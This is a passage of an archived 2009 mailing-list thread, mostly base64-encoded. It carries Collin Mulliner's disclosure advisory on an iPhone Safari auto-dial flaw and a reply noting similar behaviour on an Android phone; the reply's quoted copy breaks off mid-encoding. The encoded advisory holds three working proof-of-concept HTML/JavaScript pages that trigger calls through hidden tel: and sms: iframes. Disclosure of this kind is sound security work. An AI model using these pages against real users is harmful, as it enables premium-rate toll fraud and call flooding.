dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
